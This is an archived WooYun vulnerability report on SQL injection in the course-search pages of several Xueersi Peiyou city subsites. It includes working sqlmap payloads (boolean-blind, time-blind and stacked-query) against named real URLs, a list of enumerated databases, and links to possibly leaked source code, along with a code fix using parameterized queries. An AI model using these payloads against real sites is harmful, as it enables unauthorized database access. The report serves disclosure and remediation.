
Vulnerability summary

Defect ID: wooyun-2014-075628

Title: SQL injection in multiple Xueersi Peiyou (学而思培优) subsites, part 2

Vendor: TAL Education Group (好未来集团), Xueersi Peiyou (学而思培优)

Author: 浮萍

Submitted: 2014-09-10 10:58

Fixed: 2014-10-25 11:00

Published: 2014-10-25 11:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-09-10: Details reported to the vendor, awaiting vendor response
2014-09-11: Vendor confirmed; details visible to the vendor only
2014-09-21: Details disclosed to core white hats and domain experts
2014-10-01: Details disclosed to regular white hats
2014-10-11: Details disclosed to intern white hats
2014-10-25: Details disclosed to the public

Brief description:

wooyun-2014-075014 has been fixed.
These are the remaining issues.

Detailed description:

speiyou site
At the "年级" (grade) field
Zhengzhou
http://zz.speiyou.com/search/index

[Screenshot: Snap11.jpg]


Pick any grade in the grade field

[Screenshot: Snap12.jpg]


http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea
Append a ' after the grade parameter value

[Screenshot: Snap13.jpg]


Injection point:
http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://zz.speiyou.com:80/search/index/subject:/grade:ff808081427f932601428f443c562912' AND 1352=1352 AND 'mcTx'='mcTx/gtype:time
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://zz.speiyou.com:80/search/index/subject:/grade:ff808081427f932601428f443c562912' AND SLEEP(5) AND 'JjCx'='JjCx/gtype:time
---


Databases

available databases [3]:
[*] information_schema
[*] test
[*] xxgl


The database information matches that in http://wooyun.org/bugs/wooyun-2014-075014.
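As an added illustration (not code from the original report or from the site), the string-concatenation pattern that the grade-parameter finding above implies, beside a hardened version that allow-lists the id formats seen in the report's URLs and binds the value as a query parameter. The path-parameter parser, the SQLite table and the sample rows are constructed stand-ins, since the page does not show the site's code.

```python
import re
import sqlite3
from urllib.parse import unquote, urlsplit

# Constructed stand-in for the course table behind the search page.
SAMPLE_ROWS = [("maths", "ff808081427f932601428f4484932916"), ("physics", "13")]
# Grade ids seen in the report's URLs are a 32-char hex string or a small integer.
GRADE_ID = re.compile(r"^(?:[0-9a-f]{32}|[0-9]{1,6})$")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course (name TEXT, grade TEXT)")
    conn.executemany("INSERT INTO course VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def parse_path_params(url):
    """Split '/search/index/grade:X/subject:/level:bx' into {'grade': 'X', 'subject': '', 'level': 'bx'}."""
    params = {}
    for segment in unquote(urlsplit(url).path).split("/"):
        if ":" in segment:
            key, _, value = segment.partition(":")
            params[key] = value
    return params


def search_vulnerable(conn, grade):
    # The defect behind the finding: the path value is pasted straight into the SQL,
    # so a quote in it rewrites the WHERE clause (the boolean-based blind condition).
    sql = "SELECT name FROM course WHERE grade = '%s'" % grade
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, grade):
    # Fix: reject anything outside the expected id format, then bind the value
    # as a parameter so it can never be interpreted as SQL.
    if not GRADE_ID.match(grade):
        raise ValueError("rejected grade id: %r" % grade)
    rows = conn.execute("SELECT name FROM course WHERE grade = ?", (grade,))
    return [row[0] for row in rows]
```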

Proof of vulnerability:

Likewise,
Beijing:

http://sbj.speiyou.com/search/index/subject:ff80808127d77caa0127d7e10f1c00c4/grade:ff80808127fabe0c0127fae69bc1004a/gtype:time


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://sbj.speiyou.com:80/search/index/subject:ff80808127d77caa0127d7e10f1c00c4/grade:ff80808127fabe0c0127fae69bc1004a'; SELECT SLEEP(5)-- /gtype:time
---
[23:12:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


--------------
Tianjin
http://stj.speiyou.com/search/index/subject:/grade:13/gtype:time

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 148 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://stj.speiyou.com:80/search/index/subject:/grade:13'; SELECT SLEEP(5)-- /gtype:time
---


[Screenshot: Snap14.jpg]


---------------
I did not test the others.
It is worth checking whether the subject (学科), session (班次) and class type (班级类型) fields are also injectable,
and auditing whether the old sites have the same problems.
I also came across some source code that may or may not be Xueersi's:
https://github.com/javaxiaomangren/schedule
https://github.com/heatroom/nightmare-mooc

Remediation:

Copyright notice: please credit the source when reposting: 浮萍@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-09-11 11:21

Vendor reply:

Thanks to the reporter for the heads-up; we are investigating.

Latest status:

None